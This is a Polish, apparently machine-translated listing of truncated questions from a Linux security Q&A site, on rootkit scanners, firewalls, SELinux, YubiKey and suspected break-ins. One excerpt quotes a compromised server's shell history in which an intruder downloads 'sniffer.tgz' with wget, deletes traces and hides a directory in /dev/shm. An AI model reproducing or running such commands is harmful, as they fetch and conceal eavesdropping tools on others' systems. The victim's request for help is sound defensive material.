Bezpieczeństwo obejmuje szeroki zakres tematów, w tym użytkowników, uprawnienia, uwierzytelnianie, autoryzację, aktualizacje, zaporę ogniową, hartowanie itp.
Używam Linuksa od dłuższego czasu i zawsze czuję potrzebę posiadania pasywnej konfiguracji oprogramowania / skryptu, która może ostrzegać mnie o wszelkich podejrzanych działaniach sieciowych, takich jak skanowanie, nieudane próby logowania itp. W locie za pośrednictwem poczty elektronicznej lub przez powiadomienia wizualne / audio. Wiem, jak przeglądać dzienniki i inne rzeczy, …
Niedawno kupiłem Yubikey Neo - sprytne małe sprzętowe urządzenie do uwierzytelniania drugiego czynnika. Jest przeznaczony przede wszystkim do używania z hasłami jednorazowymi i nowym protokołem U2F - ale od wersji 2 Yubikey obsługuje także uwierzytelnianie typu wyzwanie-odpowiedź HMAC-SHA1. HMAC-SHA1 łączy tajny klucz (przechowywany w Yubikey) i łączy go z hasłem, …
Moja polityka korporacyjna mówi, że skrzynki Linux muszą być zabezpieczone przy pomocy SELinux (aby audytor bezpieczeństwa mógł zaznaczyć pole wyboru „tak, jesteśmy wyjątkowo bezpieczni!” Dla każdego serwera). Miałem nadzieję, że skorzystam z niesamowitego domyślnego bezpieczeństwa Ubuntu AppArmor. Czy nierozsądne jest uruchamianie zarówno Apparmor, jak i SELinux? (Jeśli tak, czy ten …
Jestem 99,9% pewien, że mój system na moim komputerze osobistym został infiltrowany. Pozwólcie, że najpierw przedstawię uzasadnienie, aby sytuacja była jasna: Szorstki harmonogram podejrzanych działań i podjętych później działań: 4-26 23:00 Zakończyłem wszystkie programy i zamknąłem laptopa. 4-27 12:00 Otworzyłem laptopa po tym, jak był w trybie zawieszenia przez około …
Skanowanie przez chkrootkit pokazuje „tcpd” jako ZAKAŻONY. Chociaż skanowanie przez rkhunter pokazuje ok, (z wyjątkiem zwykłych fałszywych alarmów) Czy mam się martwić? (Jestem na Ubuntu 16.10 z wersją 4.8.0-37-generic)
Wiem, że hasło sudo chroni komputer przed lokalnym włamaniem przez osobę mającą do niego fizyczny dostęp ( edytuj: w rzeczywistości tak nie jest ). Moje hasło jest wystarczająco silne do tego celu, ale wiem, że nie jest wystarczająco silne, jeśli ktoś może zdalnie go wymusić. Czy ktoś może uzyskać dostęp …
Podobnie jak 99% użytkowników, instaluję Ubuntu z gotowych plików binarnych. Jak mogę się zweryfikować, czy te pliki binarne pochodzą z oryginalnego kodu źródłowego z Ubuntu? Dobrze byłoby sprawdzić, czy NSA / ktoś nie współpracował ani z Ubuntu, ani z Linode (moim dostawcą VPS), aby zadzierać z plikami binarnymi. Gdybyśmy mogli …
Czy Ubuntu jest wyposażony w preinstalowaną lub automatyczną zaporę ogniową? Jeśli nie, czy go potrzebuję? Przeczytałem kilka artykułów na temat przewagi Linuksa nad innymi systemami operacyjnymi pod względem bezpieczeństwa (nie trzeba mieć antywirusa, ...), ale chciałbym się upewnić.
Używam Ubuntu 10.04.1 LTS. Używam rkhunter aby sprawdzić rootkitów. rkhunter narzeka na następujące ukryte pliki i katalogi. Myślę, że te pliki nie stanowią prawdziwego problemu w moim systemie, ale jak mogę sprawdzić, czy są to prawidłowe pliki? [07:57:45] Checking for hidden files and directories [ Warning ] [07:57:45] Warning: Hidden …
Wczoraj sprawdziłem historię poleceń na moim VServerie. Znalazłem kilka podejrzanych linii. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget …
Próbuję zrozumieć do-release-upgradeproces, tj. Sposób, w jaki Ubuntu zachęca mnie do aktualizacji do następnej wiosennej lub jesiennej wersji Ubuntu. Po przeczytaniu źródeł ubuntu-release-upgraderznalazłem plik / etc / update-manager / meta-release w moim systemie. Wygląda na to, że ten plik używa adresu URL HTTP, aby wskazać http://changelogs.ubuntu.com/meta-release, gdzie znajdują się różne …
Rozumiem, że jeśli jakiekolwiek złośliwe oprogramowanie przedostanie się do systemu Linux, uzyska co najwyżej uprawnienia na poziomie użytkownika i zniszczy wszystko, co znajduje się w zasięgu konkretnego użytkownika, tj. Własne pliki użytkownika. Ale co dokładnie powstrzymuje złośliwe oprogramowanie przed dostępem na poziomie root? Czy to nie może złamać hasła od …
Używamy plików cookie i innych technologii śledzenia w celu poprawy komfortu przeglądania naszej witryny, aby wyświetlać spersonalizowane treści i ukierunkowane reklamy, analizować ruch w naszej witrynie, i zrozumieć, skąd pochodzą nasi goście.
Kontynuując, wyrażasz zgodę na korzystanie z plików cookie i innych technologii śledzenia oraz potwierdzasz, że masz co najmniej 16 lat lub zgodę rodzica lub opiekuna.